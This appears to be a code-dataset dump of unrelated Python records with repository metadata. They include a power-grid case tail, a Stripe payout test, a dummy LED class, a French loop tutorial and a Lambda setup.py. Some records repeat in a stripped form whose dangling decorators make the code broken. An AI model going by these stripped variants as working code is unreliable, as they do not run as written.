[7, 5, 0 ], [8, 9, 0 ], [492, 11, 0 ], [11, 493, 0 ], [492, 493, 1 ], [494, 14, 0 ], [13, 15, 0 ], [16, 5, 0 ], [17, 18, 1 ], [17, 12, 0 ], [14, 495, 0 ], [494, 19, 0 ], [20, 21, 0 ], [20, 22, 1 ], [497, 23, 0 ], [23, 499, 1 ], [25, 26, 0 ], [25, 22, 0 ], [23, 27, 0 ], [28, 23, 0 ], [8, 21, 0 ], [9, 29, 0 ], [30, 25, 1 ], [31, 32, 1 ], [32, 33, 1 ], [34, 35, 0 ], [35, 36, 0 ], [490, 6, 1 ], [37, 10, 1 ], [10, 38, 0 ], [37, 38, 1 ], [39, 40, 1 ], [39, 41, 1 ], [42, 41, 1 ], [18, 42, 1 ], [492, 43, 1 ], [44, 45, 0 ], [44, 505, 0 ], [46, 12, 0 ], [47, 48, 0 ], [49, 50, 0 ], [31, 33, 1 ], [31, 51, 0 ], [52, 53, 1 ], [52, 54, 0 ], [506, 55, 0 ], [506, 507, 1 ], [57, 506, 0 ], [57, 58, 0 ], [58, 506, 0 ], [59, 60, 1 ], [508, 62, 0 ], [30, 61, 1 ], [63, 506, 0 ], [13, 64, 0 ], [65, 66, 1 ], [59, 67, 0 ], [61, 67, 0 ], [68, 69, 1 ], [70, 69, 1 ], [71, 72, 1 ], [73, 74, 1 ], [37, 75, 1 ], [72, 75, 0 ], [37, 72, 1 ], [76, 77, 1 ], [77, 51, 0 ], [73, 72, 1 ], [18, 40, 1 ], [492, 45, 1 ], [10, 74, 1 ], [45, 511, 1 ], [78, 32, 1 ], [79, 80, 0 ], [81, 79, 1 ], [34, 82, 0 ], [83, 84, 0 ], [83, 499, 0 ], [85, 86, 0 ], [87, 86, 1 ], [88, 89, 0 ], [90, 86, 1 ], [91, 86, 0 ], [86, 92, 0 ], [86, 93, 0 ], [94, 86, 1 ], [86, 95, 1 ], [513, 517, 0 ], [97, 66, 1 ], [42, 98, 0 ], [99, 100, 1 ], [42, 101, 0 ], [102, 42, 1 ], [103, 87, 0 ], [104, 103, 0 ], [105, 87, 0 ], [106, 107, 0 ], [108, 107, 0 ], [109, 106, 0 ], [110, 111, 1 ], [87, 112, 0 ], [113, 87, 0 ], [87, 85, 1 ], [110, 114, 1 ], [115, 116, 0 ], [117, 118, 0 ], [117, 119, 0 ], [117, 120, 1 ], [121, 122, 0 ], [123, 124, 0 ], [125, 126, 0 ], [127, 119, 0 ], [118, 128, 0 ], [121, 119, 0 ], [530, 527, 0 ], [125, 130, 0 ], [125, 123, 0 ], [131, 132, 0 ], [133, 123, 0 ], [524, 134, 0 ], [135, 136, 0 ], [123, 131, 0 ], [117, 128, 1 ], [137, 521, 0 ], [531, 514, 0 ], [139, 521, 0 ], [140, 514, 0 ], [522, 141, 0 ], [142, 523, 0 ], [530, 526, 0 ], [140, 532, 0 ], [142, 144, 0 ], [140, 522, 0 ], [145, 146, 0 ], [147, 523, 0 ], [144, 523, 0 ], [139, 523, 0 ], [140, 141, 0 ], [528, 526, 0 ], [528, 148, 0 ], [149, 150, 0 ], [145, 528, 0 ], [530, 151, 0 ], [524, 152, 0 ], [149, 525, 1 ], [139, 514, 0 ], [126, 120, 1 ], [530, 153, 0 ], [528, 147, 1 ], [528, 154, 0 ], [130, 120, 1 ], [528, 155, 1 ], [524, 533, 0 ], [524, 149, 0 ], [154, 150, 0 ], [157, 110, 1 ], [119, 158, 0 ], [159, 60, 0 ], [536, 161, 0 ], [115, 151, 0 ], [162, 134, 0 ], [115, 526, 0 ], [138, 87, 0 ], [123, 163, 0 ], [112, 164, 0 ], [112, 165, 0 ], [166, 165, 0 ], [167, 537, 0 ], [168, 104, 0 ], [531, 520, 0 ], [139, 520, 0 ], [520, 169, 0 ], [168, 105, 0 ], [520, 170, 0 ], [171, 89, 0 ], [521, 172, 0 ], [123, 173, 0 ], [521, 174, 0 ], [37, 39, 0 ], [530, 175, 0 ], [530, 176, 0 ], [88, 530, 0 ], [177, 496, 1 ], [178, 525, 0 ], [179, 493, 1 ], [180, 181, 1 ], [182, 180, 0 ], [179, 181, 0 ], [180, 493, 1 ], [183, 30, 0 ], [183, 21, 0 ], [538, 185, 0 ], [538, 89, 0 ], [184, 186, 0 ], [184, 187, 0 ], [520, 172, 0 ], [89, 175, 0 ], [185, 89, 0 ], [89, 188, 0 ], [189, 190, 0 ], [539, 172, 0 ], [504, 192, 0 ], [105, 186, 0 ], [105, 187, 0 ], [539, 193, 0 ], [187, 194, 0 ], [539, 540, 0 ], [539, 196, 0 ], [197, 540, 0 ], [110, 198, 0 ], [197, 539, 0 ], [199, 537, 0 ], [134, 526, 0 ], [200, 193, 0 ], [4, 201, 1 ], [202, 86, 0 ], [85, 203, 0 ], [147, 204, 0 ], [147, 205, 0 ], [123, 206, 0 ], [537, 207, 0 ], [165, 208, 0 ], [4, 94, 1 ], [4, 2, 0 ], [209, 4, 0 ], [119, 163, 0 ], [210, 3, 0 ], [99, 211, 0 ], [99, 69, 1 ], [212, 99, 0 ], [213, 214, 0 ], [510, 215, 0 ], [128, 69, 1 ], [216, 69, 1 ], [217, 98, 0 ], [504, 218, 0 ], [177, 504, 1 ], [219, 209, 0 ], [219, 220, 0 ], [94, 95, 1 ], [159, 221, 1 ], [34, 161, 0 ], [222, 221, 0 ], [211, 52, 1 ], [215, 223, 1 ], [224, 215, 0 ], [225, 224, 1 ], [224, 223, 0 ], [226, 6, 0 ], [7, 3, 1 ], [216, 227, 1 ], [228, 229, 0 ], [227, 230, 0 ], [231, 53, 1 ], [544, 545, 0 ], [234, 235, 1 ], [546, 214, 1 ], [233, 227, 0 ], [237, 238, 0 ], [212, 100, 0 ], [519, 239, 0 ], [238, 519, 0 ], [213, 240, 0 ], [241, 242, 1 ], [70, 241, 0 ], [509, 213, 0 ], [68, 243, 0 ], [243, 244, 0 ], [68, 244, 0 ], [544, 547, 1 ], [245, 227, 1 ], [246, 208, 0 ], [112, 208, 0 ], [165, 247, 0 ], [537, 549, 0 ], [537, 550, 0 ], [537, 551, 0 ], [110, 251, 0 ], [510, 252, 1 ], [529, 253, 1 ], [237, 239, 1 ], [254, 238, 1 ], [69, 255, 0 ], [510, 225, 1 ], [256, 257, 0 ], [258, 190, 0 ], [258, 259, 0 ], [260, 261, 1 ], [554, 553, 1 ], [515, 263, 0 ], [14, 264, 1 ], [116, 555, 0 ], [151, 116, 0 ], [111, 114, 1 ], [77, 111, 0 ], [266, 525, 0 ], [267, 120, 1 ], [268, 269, 0 ], [556, 271, 0 ], [556, 272, 0 ], [529, 273, 0 ], [128, 274, 0 ], [34, 275, 0 ], [503, 276, 0 ], [503, 504, 1 ], [177, 218, 1 ], [277, 278, 1 ], [557, 558, 1 ], [557, 559, 1 ], [559, 558, 1 ], [277, 78, 1 ], [277, 279, 1 ], [78, 279, 0 ], [281, 282, 0 ], [283, 161, 1 ], [268, 161, 1 ], [256, 284, 0 ], [515, 516, 1 ], [263, 516, 0 ], [516, 285, 0 ], [63, 286, 0 ], [287, 516, 0 ], [8, 102, 1 ], [8, 101, 1 ], [80, 288, 0 ], [80, 289, 0 ], [276, 560, 0 ], [37, 290, 0 ], [290, 74, 1 ], [512, 291, 0 ], [78, 292, 1 ], [199, 548, 0 ], [491, 293, 0 ], [4, 294, 0 ], [490, 541, 1 ], [491, 295, 0 ], [491, 296, 0 ], [295, 297, 0 ], [508, 161, 0 ], [117, 123, 0 ], [133, 117, 0 ], [71, 74, 1 ], [74, 278, 1 ], [298, 515, 0 ], [5, 299, 0 ], [32, 292, 1 ], [5, 29, 1 ], [503, 560, 0 ], [300, 301, 1 ], [51, 300, 0 ], [244, 302, 1 ], [31, 302, 1 ], [51, 282, 1 ], [303, 304, 0 ], [305, 304, 0 ], [305, 259, 0 ], [306, 307, 1 ], [305, 308, 0 ], [305, 309, 0 ], [310, 309, 1 ], [306, 309, 1 ], [311, 280, 0 ], [280, 278, 1 ], [311, 32, 1 ], [13, 312, 1 ], [313, 314, 0 ], [312, 313, 1 ], [547, 566, 1 ], [245, 315, 1 ], [312, 316, 0 ], [312, 314, 0 ], [554, 546, 1 ], [262, 216, 1 ], [317, 233, 0 ], [318, 317, 0 ], [231, 52, 1 ], [319, 567, 0 ], [557, 321, 0 ], [277, 65, 1 ], [322, 288, 1 ], [322, 323, 0 ], [277, 324, 1 ], [324, 325, 0 ], [277, 325, 0 ], [326, 327, 0 ], [328, 326, 1 ], [328, 327, 1 ], [326, 329, 0 ], [568, 329, 1 ], [568, 326, 0 ], [332, 78, 1 ], [333, 306, 0 ], [332, 333, 0 ], [332, 334, 0 ], [66, 334, 1 ], [330, 335, 1 ], [336, 66, 0 ], [330, 336, 1 ], [68, 70, 0 ], [509, 337, 1 ], [324, 288, 0 ], [338, 559, 0 ], [339, 559, 0 ], [339, 340, 1 ], [559, 340, 1 ], [341, 292, 0 ], [557, 342, 0 ], [558, 343, 0 ], [502, 340, 1 ], [72, 32, 1 ], [344, 345, 0 ], [346, 47, 0 ], [46, 47, 0 ], [346, 345, 0 ], [347, 328, 0 ], [347, 348, 1 ], [571, 348, 1 ], [347, 572, 0 ], [571, 570, 1 ], [14, 350, 0 ], [350, 573, 0 ], [15, 351, 1 ], [352, 15, 0 ], [15, 335, 1 ], [232, 227, 0 ], [565, 544, 1 ], [235, 567, 1 ], [567, 286, 0 ], [353, 519, 0 ], [354, 353, 0 ], [355, 354, 0 ], [354, 356, 0 ], [357, 358, 0 ], [574, 359, 0 ], [235, 575, 0 ], [167, 361, 0 ], [528, 362, 0 ], [363, 344, 0 ], [259, 364, 1 ], [54, 56, 0 ], [365, 364, 0 ], [231, 366, 0 ], [30, 367, 0 ], [61, 367, 1 ], [254, 368, 0 ], [254, 369, 0 ], [254, 370, 0 ], [99, 358, 0 ], [354, 519, 0 ], [571, 371, 0 ], [207, 372, 0 ], [57, 373, 0 ], [209, 374, 0 ], [375, 376, 0 ], [376, 377, 0 ], [16, 49, 0 ], [318, 377, 0 ], [378, 297, 0 ], [562, 379, 0 ], [576, 563, 0 ], [576, 381, 0 ], [577, 576, 1 ], [244, 383, 0 ], [244, 306, 1 ], [383, 306, 1 ], [380, 306, 0 ], [252, 225, 0 ], [220, 76, 0 ], [542, 384, 0 ], [385, 384, 0 ], [542, 385, 0 ], [386, 385, 0 ], [387, 578, 0 ], [332, 388, 1 ], [382, 332, 1 ], [382, 388, 0 ], [579, 578, 0 ], [577, 387, 1 ], [144, 390, 0 ], [37, 49, 0 ], [391, 233, 0 ], [392, 310, 0 ], [260, 393, 0 ], [394, 230, 0 ], [395, 282, 1 ], [395, 244, 0 ], [25, 396, 1 ], [81, 74, 0 ], [278, 80, 1 ], [81, 278, 1 ], [569, 570, 0 ], [397, 552, 0 ], [542, 398, 0 ], [398, 385, 0 ], [399, 499, 0 ], [83, 399, 0 ], [498, 400, 0 ], [518, 239, 1 ], [575, 543, 0 ], [401, 360, 0 ], [580, 581, 0 ], [401, 402, 0 ], [403, 231, 0 ], [189, 360, 1 ], [234, 404, 0 ], [235, 404, 1 ], [235, 580, 0 ], [216, 259, 0 ], [405, 259, 0 ], [405, 318, 0 ], [406, 230, 0 ], [542, 407, 0 ], [23, 408, 0 ], [577, 348, 0 ], [562, 564, 1 ], [582, 507, 0 ], [27, 410, 0 ], [501, 27, 0 ], [27, 411, 0 ], [411, 410, 0 ], [403, 360, 0 ], [412, 360, 0 ], [326, 413, 0 ], [414, 413, 0 ], [6, 297, 0 ], [554, 580, 1 ], [262, 401, 1 ], [499, 556, 1 ], [224, 229, 0 ], [583, 507, 0 ], [415, 307, 0 ], [416, 507, 0 ], [284, 561, 0 ], [543, 417, 0 ], [418, 506, 0 ], [220, 157, 0 ], [295, 419, 0 ], [295, 420, 0 ], [541, 62, 0 ], [52, 421, 0 ], [60, 160, 0 ], [535, 161, 0 ], [267, 282, 0 ], [52, 365, 0 ], [28, 27, 0 ], [30, 201, 1 ], [422, 81, 0 ], [119, 425, 0 ], [423, 425, 0 ], [424, 425, 0 ], [426, 428, 0 ], [427, 428, 0 ], [19, 428, 1 ], [45, 429, 0 ], [44, 429, 0 ], [505, 429, 0 ], [231, 431, 1 ], [190, 431, 1 ], [430, 431, 0 ], [286, 433, 0 ], [432, 433, 0 ], [506, 433, 0 ], [23, 434, 0 ], [400, 434, 0 ], [500, 434, 0 ], [32, 436, 0 ], [435, 436, 0 ], [78, 436, 1 ], [86, 438, 1 ], [437, 438, 0 ], [221, 438, 0 ], [207, 439, 0 ], [516, 439, 0 ], [513, 439, 0 ], [181, 441, 1 ], [440, 441, 0 ], [504, 441, 1 ], [135, 442, 0 ], [109, 442, 0 ], [112, 442, 0 ], [113, 443, 0 ], [132, 443, 0 ], [107, 443, 0 ], [444, 445, 0 ], [112, 445, 0 ], [109, 445, 0 ], [119, 447, 1 ], [100, 447, 1 ], [446, 447, 0 ], [124, 448, 0 ], [125, 448, 0 ], [131, 448, 0 ], [449, 450, 0 ], [173, 450, 0 ], [184, 450, 0 ], [144, 451, 0 ], [140, 451, 0 ], [514, 451, 0 ], [537, 585, 1 ], [141, 585, 0 ], [584, 585, 0 ], [522, 454, 0 ], [144, 454, 0 ], [453, 454, 0 ], [199, 456, 0 ], [140, 456, 0 ], [455, 456, 0 ], [537, 456, 0 ], [538, 457, 0 ], [153, 457, 0 ], [176, 457, 0 ], [524, 459, 0 ], [458, 459, 0 ], [134, 459, 0 ], [460, 461, 0 ], [150, 461, 0 ], [149, 461, 0 ], [521, 463, 0 ], [462, 463, 0 ], [538, 463, 0 ], [110, 464, 0 ], [90, 464, 0 ], [165, 464, 0 ], [458, 465, 0 ], [134, 465, 0 ], [524, 465, 0 ], [466, 467, 0 ], [110, 467, 0 ], [165, 467, 0 ], [468, 469, 0 ], [541, 469, 0 ], [490, 469, 0 ], [263, 471, 0 ], [470, 471, 0 ], [534, 471, 0 ], [136, 472, 0 ], [110, 472, 0 ], [251, 472, 0 ], [226, 474, 0 ], [473, 474, 0 ], [257, 474, 0 ], [6, 474, 1 ], [299, 475, 1 ], [3, 475, 0 ], [210, 475, 0 ], [297, 476, 0 ], [296, 476, 0 ], [295, 476, 0 ], [313, 478, 1 ], [477, 478, 0 ], [245, 478, 0 ], [479, 481, 0 ], [565, 481, 0 ], [480, 481, 0 ], [415, 482, 0 ], [56, 482, 0 ], [409, 482, 0 ], [483, 484, 0 ], [3, 484, 0 ], [301, 484, 0 ], [233, 485, 0 ], [392, 485, 0 ], [391, 485, 0 ], [579, 488, 0 ], [486, 488, 0 ], [487, 488, 0 ], [270, 489, 0 ], [331, 489, 0 ], [396, 489, 1 ], [519, 253, 0 ], [382, 349, 1 ], [349, 351, 0 ], [459, 465, 0 ], [549, 550, 0 ], [550, 551, 0 ], [194, 195, 0 ], [247, 248, 0 ], [2, 294, 0 ], [549, 551, 0 ], [54, 365, 0 ], [131, 265, 0 ], [91, 92, 0 ], [247, 249, 0 ], [186, 191, 0 ], [129, 173, 0 ], [96, 202, 0 ], [53, 320, 0 ], [24, 396, 0 ], [133, 156, 0 ], [442, 452, 0 ], [445, 452, 0 ], [247, 250, 0 ], [187, 195, 0 ], [216, 236, 0 ], [244, 389, 0 ], [394, 406, 0 ], [442, 445, 0 ], [442, 444, 0 ], [198, 472, 0 ], [464, 467, 0 ], [198, 251, 0 ], [112, 143, 0 ], [2, 490, 0 ], [5, 491, 0 ], [10, 492, 0 ], [12, 493, 0 ], [13, 494, 0 ], [15, 495, 0 ], [18, 496, 0 ], [20, 497, 0 ], [22, 498, 0 ], [24, 499, 0 ], [26, 500, 0 ], [30, 501, 0 ], [32, 502, 0 ], [37, 503, 0 ], [42, 504, 0 ], [46, 505, 0 ], [52, 506, 0 ], [56, 507, 0 ], [61, 508, 0 ], [68, 509, 0 ], [69, 510, 0 ], [74, 511, 0 ], [78, 512, 0 ], [86, 513, 0 ], [87, 514, 0 ], [94, 515, 0 ], [95, 516, 0 ], [96, 517, 0 ], [99, 518, 0 ], [100, 519, 0 ], [104, 520, 0 ], [105, 521, 0 ], [106, 522, 0 ], [107, 523, 0 ], [117, 524, 0 ], [120, 525, 0 ], [123, 526, 0 ], [124, 527, 0 ], [125, 528, 0 ], [128, 529, 0 ], [129, 530, 0 ], [138, 531, 0 ], [143, 532, 0 ], [156, 533, 0 ], [157, 534, 0 ], [159, 535, 0 ], [160, 536, 0 ], [165, 537, 0 ], [184, 538, 0 ], [191, 539, 0 ], [195, 540, 0 ], [201, 541, 0 ], [220, 542, 0 ], [231, 543, 0 ], [232, 544, 0 ], [233, 545, 0 ], [236, 546, 0 ], [245, 547, 0 ], [246, 548, 0 ], [248, 549, 0 ], [249, 550, 0 ], [250, 551, 0 ], [259, 552, 0 ], [261, 553, 0 ], [262, 554, 0 ], [265, 555, 0 ], [270, 556, 0 ], [277, 557, 0 ], [279, 558, 0 ], [280, 559, 0 ], [290, 560, 0 ], [301, 561, 0 ], [305, 562, 0 ], [306, 563, 0 ], [310, 564, 0 ], [313, 565, 0 ], [315, 566, 0 ], [320, 567, 0 ], [330, 568, 0 ], [332, 569, 0 ], [334, 570, 0 ], [336, 571, 0 ], [349, 572, 0 ], [351, 573, 0 ], [358, 574, 0 ], [360, 575, 0 ], [380, 576, 0 ], [382, 577, 0 ], [383, 578, 0 ], [389, 579, 0 ], [401, 580, 0 ], [402, 581, 0 ], [409, 582, 0 ], [415, 583, 0 ], [444, 584, 0 ], [452, 585, 0 ] ]) ppc["parameters"] = { "x_trans_sg": 0.003, "x_trans_fm": 0.001, "x_trans_fl": 0.001, "d_l": 1e-3, "d_l_perturb": 1e-5, "w_1_ij": 1, "w_2_ij": 1, "w_3_ij": 1, "w_4_ij": 1, "b_r": 238, "b_c": 248 } return ppc
398,694
0
22
5fce4f32c59cbf2710e6f68e6f01a2641933d1a1
564
py
Python
env/lib/python2.7/site-packages/stripe/test/resources/test_payouts.py
imran1234567/plutus
c964f18beb139de2645e052eb4c75a6bc0677029
[ "MIT" ]
null
null
null
env/lib/python2.7/site-packages/stripe/test/resources/test_payouts.py
imran1234567/plutus
c964f18beb139de2645e052eb4c75a6bc0677029
[ "MIT" ]
8
2019-06-10T19:43:54.000Z
2021-11-15T17:48:16.000Z
Lib/site-packages/stripe/test/resources/test_payouts.py
JulioCantu/IndiStore
723c4ced800d43ffbfd34dc0ff7649b628008416
[ "bzip2-1.0.6" ]
null
null
null
import stripe from stripe.test.helper import StripeResourceTest
22.56
55
0.576241
import stripe from stripe.test.helper import StripeResourceTest class PayoutTest(StripeResourceTest): def test_list_payouts(self): stripe.Payout.list() self.requestor_mock.request.assert_called_with( 'get', '/v1/payouts', {} ) def test_cancel_payout(self): payout = stripe.Payout(id='po_cancel') payout.cancel() self.requestor_mock.request.assert_called_with( 'post', '/v1/payouts/po_cancel/cancel', {}, None )
406
16
77
9470da2d0635021627dca44b44a547d259bd8a63
1,783
py
Python
src/scs_dfe/display/led_state.py
open-seneca/alphasense_aq_sensor
12f37f19b4e2fe6f159b127261130d8d3bc48196
[ "MIT" ]
1
2021-05-10T09:12:13.000Z
2021-05-10T09:12:13.000Z
src/scs_dfe/display/led_state.py
open-seneca/alphasense_aq_sensor
12f37f19b4e2fe6f159b127261130d8d3bc48196
[ "MIT" ]
null
null
null
src/scs_dfe/display/led_state.py
open-seneca/alphasense_aq_sensor
12f37f19b4e2fe6f159b127261130d8d3bc48196
[ "MIT" ]
2
2019-03-07T00:25:11.000Z
2020-02-28T13:45:55.000Z
""" Created on 10 Nov 2018 @author: Bruno Beloff (bruno.beloff@southcoastscience.com) a dummy LED state, to maintain compatibility with the DFE Eng package """ from collections import OrderedDict from scs_core.data.json import JSONable # -------------------------------------------------------------------------------------------------------------------- class LEDState(JSONable): """ classdocs """ # ---------------------------------------------------------------------------------------------------------------- @classmethod # ---------------------------------------------------------------------------------------------------------------- # noinspection PyUnusedLocal def __init__(self, colour0, colour1): """ Constructor """ pass # ---------------------------------------------------------------------------------------------------------------- @classmethod # ---------------------------------------------------------------------------------------------------------------- # ---------------------------------------------------------------------------------------------------------------- @property @property # ----------------------------------------------------------------------------------------------------------------
24.763889
118
0.325294
""" Created on 10 Nov 2018 @author: Bruno Beloff (bruno.beloff@southcoastscience.com) a dummy LED state, to maintain compatibility with the DFE Eng package """ from collections import OrderedDict from scs_core.data.json import JSONable # -------------------------------------------------------------------------------------------------------------------- class LEDState(JSONable): """ classdocs """ # ---------------------------------------------------------------------------------------------------------------- @classmethod def construct_from_jdict(cls, _): return LEDState(None, None) # ---------------------------------------------------------------------------------------------------------------- # noinspection PyUnusedLocal def __init__(self, colour0, colour1): """ Constructor """ pass # ---------------------------------------------------------------------------------------------------------------- @classmethod def is_valid(cls): return None # ---------------------------------------------------------------------------------------------------------------- def as_json(self): jdict = OrderedDict() jdict['colour0'] = None jdict['colour1'] = None return jdict # ---------------------------------------------------------------------------------------------------------------- @property def colour0(self): return None @property def colour1(self): return None # ---------------------------------------------------------------------------------------------------------------- def __str__(self, *args, **kwargs): return "LEDState:{colour0:None, colour1:None}"
282
0
158
90fdb9009ee72b8b1db38f9c34195a42d71de57f
2,344
py
Python
Scripts/001_le_tutoriel_python/s004_les_instructions_de_controle.py
OrangePeelFX/Python-Tutorial
0d47f194553666304765f5bbc928374b7aec8a48
[ "MIT" ]
null
null
null
Scripts/001_le_tutoriel_python/s004_les_instructions_de_controle.py
OrangePeelFX/Python-Tutorial
0d47f194553666304765f5bbc928374b7aec8a48
[ "MIT" ]
1
2021-06-02T00:28:17.000Z
2021-06-02T00:28:17.000Z
Scripts/001_le_tutoriel_python/s004_les_instructions_de_controle.py
florianwns/python-scripts
0d47f194553666304765f5bbc928374b7aec8a48
[ "MIT" ]
1
2020-01-13T11:08:18.000Z
2020-01-13T11:08:18.000Z
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """Les boucles et les instruction de contrôle Quelques exemples de manipulations des boucles et des instructions """ # la suite de fibonnaci a, b = 0, 1 while a < 20: print(a, end=",") # on idente de 4 espace l'instruction suivante a, b = b, a+b print() if a == 21: print("_") elif a == 13: # 'else if' se note 'elif' en python print("°") else: print(")") # Un peu d'unicode ;) et des boucles for words = ["Bonjour", "Jeune", "Padawan"] for w in words: if w == "Yoda": break # le 'break' permet de sortie de la boucle, else: # par contre on passe dans le 'else' si le break # n'est jamais appelé dans la boucle for' # ici on utilise le r de raw_string st = r""" ____ (xXXXX|xx======---(- / | / XX| /xxx XXX| /xxx X | / ________| __ ____/_|_|_______\_ ###|=||________|_________|_ ~~ |==| __ _ __ /|~~~~~~~~~-------------_______ |==| ||(( ||()| | |XXXXXXXX| > __ |==| ~~__~__~~__ \|_________-------------~~~~~~~ ###|=||~~~~~~~~|_______ |" ~~ ~~~~\~|~| /~ \ ~~~~~~~~~ \xxx X | \xxx XXX| \ XX| Incom's T-65B X-wing Space \ | Superiority Starfighter (4) (xXXXX|xx======---(- ~~~~""" print(st) # on peut aussi utiliser range dans la même idée # que la boucle for(i = 0; i < words.length; i++) dans d'autres langage for i in range(len(words)): print(words[i], len(words[i])) # exemple de range qui est objet iterable, # et pas une liste à proprement parlée range(5) # 0, 1, 2, 3, 4 range(5, 10) # 5, 6, 7, 8, 9 range(0, 10, 3) # 0, 3, 6, 9 range(-10, -100, -30) # -10, -40, -70 # mot clé 'pass' a = 9 if a < 10: pass # 'pass' ne fait rien, mais est parfois nécessaire après une instruction # TODO : Afficher un message d'erreur... else: print("a supérieur a 10")
30.051282
88
0.433447
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """Les boucles et les instruction de contrôle Quelques exemples de manipulations des boucles et des instructions """ # la suite de fibonnaci a, b = 0, 1 while a < 20: print(a, end=",") # on idente de 4 espace l'instruction suivante a, b = b, a+b print() if a == 21: print("_") elif a == 13: # 'else if' se note 'elif' en python print("°") else: print(")") # Un peu d'unicode ;) et des boucles for words = ["Bonjour", "Jeune", "Padawan"] for w in words: if w == "Yoda": break # le 'break' permet de sortie de la boucle, else: # par contre on passe dans le 'else' si le break # n'est jamais appelé dans la boucle for' # ici on utilise le r de raw_string st = r""" ____ (xXXXX|xx======---(- / | / XX| /xxx XXX| /xxx X | / ________| __ ____/_|_|_______\_ ###|=||________|_________|_ ~~ |==| __ _ __ /|~~~~~~~~~-------------_______ |==| ||(( ||()| | |XXXXXXXX| > __ |==| ~~__~__~~__ \|_________-------------~~~~~~~ ###|=||~~~~~~~~|_______ |" ~~ ~~~~\~|~| /~ \ ~~~~~~~~~ \xxx X | \xxx XXX| \ XX| Incom's T-65B X-wing Space \ | Superiority Starfighter (4) (xXXXX|xx======---(- ~~~~""" print(st) # on peut aussi utiliser range dans la même idée # que la boucle for(i = 0; i < words.length; i++) dans d'autres langage for i in range(len(words)): print(words[i], len(words[i])) # exemple de range qui est objet iterable, # et pas une liste à proprement parlée range(5) # 0, 1, 2, 3, 4 range(5, 10) # 5, 6, 7, 8, 9 range(0, 10, 3) # 0, 3, 6, 9 range(-10, -100, -30) # -10, -40, -70 # mot clé 'pass' a = 9 if a < 10: pass # 'pass' ne fait rien, mais est parfois nécessaire après une instruction # TODO : Afficher un message d'erreur... else: print("a supérieur a 10")
0
0
0
3ceaf757a4a9ba8ec3f0e7a41102e00bf16e21bf
228
py
Python
optimal-road-trip/runtime_timer.py
YoungMaker/Machine-Learning-Analysis-With-CUDA
f67cdce6d47a341bab55c20057bb939929c98dc3
[ "Unlicense", "CC-BY-4.0", "MIT" ]
null
null
null
optimal-road-trip/runtime_timer.py
YoungMaker/Machine-Learning-Analysis-With-CUDA
f67cdce6d47a341bab55c20057bb939929c98dc3
[ "Unlicense", "CC-BY-4.0", "MIT" ]
null
null
null
optimal-road-trip/runtime_timer.py
YoungMaker/Machine-Learning-Analysis-With-CUDA
f67cdce6d47a341bab55c20057bb939929c98dc3
[ "Unlicense", "CC-BY-4.0", "MIT" ]
null
null
null
import time
16.285714
43
0.614035
import time class runtimeTimer(object): def __init__(self): self.starttime = time.time() def start(self): self.starttime = time.time() def stop(self): return time.time() - self.starttime
105
6
104
e1e1c9c9b3b1d2f9ea5e172e14b36b3bf582c0be
652
py
Python
lambda/setup.py
ingalls/ml-enabler
efda973cb3fa9954cbe24cd0963a7b8f5be5ad6f
[ "BSD-2-Clause" ]
null
null
null
lambda/setup.py
ingalls/ml-enabler
efda973cb3fa9954cbe24cd0963a7b8f5be5ad6f
[ "BSD-2-Clause" ]
6
2021-06-08T22:14:52.000Z
2022-03-12T00:45:58.000Z
lambda/setup.py
ingalls/ml-enabler
efda973cb3fa9954cbe24cd0963a7b8f5be5ad6f
[ "BSD-2-Clause" ]
null
null
null
"""Setup.""" from setuptools import setup, find_packages inst_reqs = [ "mercantile == 1.1.5", "requests", "geojson", "pillow", "gdal == 2.4.2", "shapely == 1.6.4", "affine == 2.3.0", "numpy == 1.19.0", "rasterio == 1.1.5" ] extra_reqs = {"test": ["pytest", "pytest-cov"]} setup( name="app", version="0.5.0", description=u"Lambda Download and Predict", python_requires=">=3", keywords="AWS-Lambda Python", packages=find_packages(exclude=["ez_setup", "examples", "tests"]), include_package_data=True, zip_safe=False, install_requires=inst_reqs, extras_require=extra_reqs, )
21.733333
70
0.602761
"""Setup.""" from setuptools import setup, find_packages inst_reqs = [ "mercantile == 1.1.5", "requests", "geojson", "pillow", "gdal == 2.4.2", "shapely == 1.6.4", "affine == 2.3.0", "numpy == 1.19.0", "rasterio == 1.1.5" ] extra_reqs = {"test": ["pytest", "pytest-cov"]} setup( name="app", version="0.5.0", description=u"Lambda Download and Predict", python_requires=">=3", keywords="AWS-Lambda Python", packages=find_packages(exclude=["ez_setup", "examples", "tests"]), include_package_data=True, zip_safe=False, install_requires=inst_reqs, extras_require=extra_reqs, )
0
0
0
a51f153c8663eebe0dd7b69da625b02703f7e870
950
py
Python
cumm/tensorview/gemm.py
FindDefinition/cumm
3d58e85b660afa05c20514afe65b8aa3a4995953
[ "Apache-2.0" ]
20
2021-10-13T03:41:59.000Z
2022-03-31T07:23:14.000Z
cumm/tensorview/gemm.py
FindDefinition/cumm
3d58e85b660afa05c20514afe65b8aa3a4995953
[ "Apache-2.0" ]
3
2021-11-21T11:25:55.000Z
2022-03-08T06:12:35.000Z
cumm/tensorview/gemm.py
FindDefinition/cumm
3d58e85b660afa05c20514afe65b8aa3a4995953
[ "Apache-2.0" ]
4
2021-10-13T03:42:01.000Z
2022-03-21T13:07:56.000Z
# Copyright 2022 Yan Yan # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from cumm.core_cc.tensorview_bind import (NVRTCParams, GemmAlgoDesp, ConvAlgoDesp, ConvParams, ConvOpType, ConvLayoutType, ShuffleStrideType, ConvMode, run_nvrtc_conv_kernel, GemmParams, run_nvrtc_gemm_kernel)
47.5
79
0.649474
# Copyright 2022 Yan Yan # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from cumm.core_cc.tensorview_bind import (NVRTCParams, GemmAlgoDesp, ConvAlgoDesp, ConvParams, ConvOpType, ConvLayoutType, ShuffleStrideType, ConvMode, run_nvrtc_conv_kernel, GemmParams, run_nvrtc_gemm_kernel)
0
0
0
0a6eebd1d93127e3126b0ebdfd4693d4c9e4d3a9
